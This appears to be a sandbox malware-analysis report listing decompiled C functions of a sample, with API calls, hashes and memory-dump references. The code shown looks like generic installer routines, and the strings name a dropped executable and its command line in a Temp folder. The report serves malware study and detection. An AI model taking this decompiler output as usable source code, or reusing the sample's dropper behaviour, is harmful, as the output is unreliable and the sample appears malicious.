                                                        0x00406891
                                                        0x00406777
                                                        0x0040677b
                                                        0x0040677b
                                                        0x0040677c
                                                        0x0040677e
                                                        0x004067bb
                                                        0x004067be
                                                        0x004067ce
                                                        0x004067d1
                                                        0x004067d9
                                                        0x004067df
                                                        0x004067df
                                                        0x0040683a
                                                        0x0040683a
                                                        0x0040683c
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e3
                                                        0x004067e8
                                                        0x004067e9
                                                        0x004067eb
                                                        0x00406802
                                                        0x00406810
                                                        0x00406816
                                                        0x00406818
                                                        0x00406836
                                                        0x00406836
                                                        0x00406836
                                                        0x00000000
                                                        0x00406836
                                                        0x0040681e
                                                        0x00406827
                                                        0x0040682a
                                                        0x00406830
                                                        0x00406834
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406834
                                                        0x004067fc
                                                        0x004067fe
                                                        0x00406800
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406800
                                                        0x00000000
                                                        0x0040683a
                                                        0x004067c6
                                                        0x00000000
                                                        0x00406780
                                                        0x0040679e
                                                        0x004067a7
                                                        0x00406844
                                                        0x00406848
                                                        0x00406850
                                                        0x00406850
                                                        0x00000000
                                                        0x00406848
                                                        0x004067b1
                                                        0x0040683e
                                                        0x00406842
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406842
                                                        0x0040677e
                                                        0x00000000
                                                        0x0040670b

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000400), ref: 004067C6
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                                                        • lstrcatW.KERNEL32 ref: 00406850
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4260037668-2039163676
                                                        • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                                        • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                                                        • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                                        • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                        0x00404643
                                                        0x004046f9
                                                        0x00000000
                                                        0x004046f9
                                                        0x00404654
                                                        0x00404658
                                                        0x00000000
                                                        0x00404672
                                                        0x00404672
                                                        0x0040467b
                                                        0x00000000
                                                        0x00000000
                                                        0x0040467d
                                                        0x00404689
                                                        0x0040468c
                                                        0x0040468c
                                                        0x00404692
                                                        0x00404698
                                                        0x00404698
                                                        0x004046a4
                                                        0x004046aa
                                                        0x004046b1
                                                        0x004046b4
                                                        0x004046b7
                                                        0x004046b9
                                                        0x004046b9
                                                        0x004046c1
                                                        0x004046c7
                                                        0x004046c7
                                                        0x004046d1
                                                        0x004046d6
                                                        0x004046d9
                                                        0x004046de
                                                        0x004046e1
                                                        0x004046e1
                                                        0x004046f1
                                                        0x004046f1
                                                        0x00000000
                                                        0x004046f4

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                        • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                        • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                        0x004026ec
                                                        0x004026ee
                                                        0x004026f1
                                                        0x004026f3
                                                        0x004026f6
                                                        0x004026fb
                                                        0x004026ff
                                                        0x00402702
                                                        0x00402705
                                                        0x00402c2a
                                                        0x00402c2d
                                                        0x0040270b
                                                        0x0040270b
                                                        0x00402712
                                                        0x00402714
                                                        0x00402714
                                                        0x0040271a
                                                        0x0040287e
                                                        0x0040287e
                                                        0x00402881
                                                        0x00402886
                                                        0x004015b6
                                                        0x0040292e
                                                        0x0040292e
                                                        0x00000000
                                                        0x00402720
                                                        0x00402721
                                                        0x0040272c
                                                        0x0040272f
                                                        0x0040273b
                                                        0x0040273f
                                                        0x004027d7
                                                        0x004027ef
                                                        0x004027ff
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402745
                                                        0x00402745
                                                        0x00402748
                                                        0x00402749
                                                        0x0040274c
                                                        0x00402751
                                                        0x00402758
                                                        0x00402760
                                                        0x00000000
                                                        0x00402766
                                                        0x00402766
                                                        0x0040276b
                                                        0x00000000
                                                        0x00402771
                                                        0x00402771
                                                        0x00402779
                                                        0x0040277c
                                                        0x0040277f
                                                        0x0040283a
                                                        0x00402841
                                                        0x00402785
                                                        0x0040278b
                                                        0x00402797
                                                        0x00402801
                                                        0x00402801
                                                        0x00402799
                                                        0x00402799
                                                        0x0040279c
                                                        0x0040279e
                                                        0x0040279e
                                                        0x0040279e
                                                        0x004027a1
                                                        0x004027a6
                                                        0x004027a9
                                                        0x00000000
                                                        0x00000000
                                                        0x004027ab
                                                        0x004027ae
                                                        0x004027bc
                                                        0x004027c2
                                                        0x004027d0
                                                        0x00000000
                                                        0x004027d2
                                                        0x00000000
                                                        0x004027d2
                                                        0x00000000
                                                        0x004027d0
                                                        0x0040279e
                                                        0x00402804
                                                        0x00402807
                                                        0x00000000
                                                        0x00402809
                                                        0x0040280e
                                                        0x0040284f
                                                        0x00402871
                                                        0x00402878
                                                        0x0040285d
                                                        0x0040285d
                                                        0x00402860
                                                        0x00402863
                                                        0x00402866
                                                        0x00402866
                                                        0x00000000
                                                        0x00402817
                                                        0x00402817
                                                        0x0040281a
                                                        0x0040281d
                                                        0x00402823
                                                        0x00402827
                                                        0x0040282a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040282a
                                                        0x0040280e
                                                        0x00402807
                                                        0x0040277f
                                                        0x0040276b
                                                        0x00402760
                                                        0x00000000
                                                        0x0040282c
                                                        0x0040282c
                                                        0x0040282f
                                                        0x00402838
                                                        0x00000000
                                                        0x0040272f
                                                        0x0040271a
                                                        0x00402c33
                                                        0x00402c39

                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                          • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                                        • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                                                        • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                                        • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                        0x004056d6
                                                        0x004056e0
                                                        0x004056e5
                                                        0x004056eb
                                                        0x004056f6
                                                        0x004056f9
                                                        0x004056fc
                                                        0x00405702
                                                        0x00405702
                                                        0x00405708
                                                        0x00405710
                                                        0x00405713
                                                        0x00405730
                                                        0x00405734
                                                        0x0040573d
                                                        0x0040573d
                                                        0x00405747
                                                        0x00405750
                                                        0x0040575c
                                                        0x00405763
                                                        0x00405767
                                                        0x0040576a
                                                        0x0040577d
                                                        0x0040578b
                                                        0x0040578b
                                                        0x0040578f
                                                        0x00405791
                                                        0x00405794
                                                        0x00000000
                                                        0x00405794
                                                        0x00405715
                                                        0x0040571d
                                                        0x00405725
                                                        0x0040572b
                                                        0x00000000
                                                        0x0040572b
                                                        0x00405725
                                                        0x00405713
                                                        0x004057a0

                                                        APIs
                                                        • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                        • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                        • lstrcatW.KERNEL32 ref: 0040572B
                                                        • SetWindowTextW.USER32 ref: 0040573D
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                          • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                        • String ID:
                                                        • API String ID: 1495540970-0
                                                        • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                                        • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                                                        • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                                        • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                        0x004068f7
                                                        0x00406900
                                                        0x00406917
                                                        0x00406917
                                                        0x0040691e
                                                        0x0040692a
                                                        0x0040692a
                                                        0x0040692d
                                                        0x00406930
                                                        0x00406935
                                                        0x00406937
                                                        0x00406940
                                                        0x00406944
                                                        0x00406961
                                                        0x00406969
                                                        0x00406969
                                                        0x0040696e
                                                        0x00406970
                                                        0x00406973
                                                        0x00406978
                                                        0x00406979
                                                        0x0040697d
                                                        0x0040697d
                                                        0x0040697e
                                                        0x00406985
                                                        0x00406987
                                                        0x0040698e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406996
                                                        0x0040699c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040699c
                                                        0x004069a1

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-3083651966
                                                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                        • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                                                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                        • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}







                                                        0x0040303d
                                                        0x0040303f
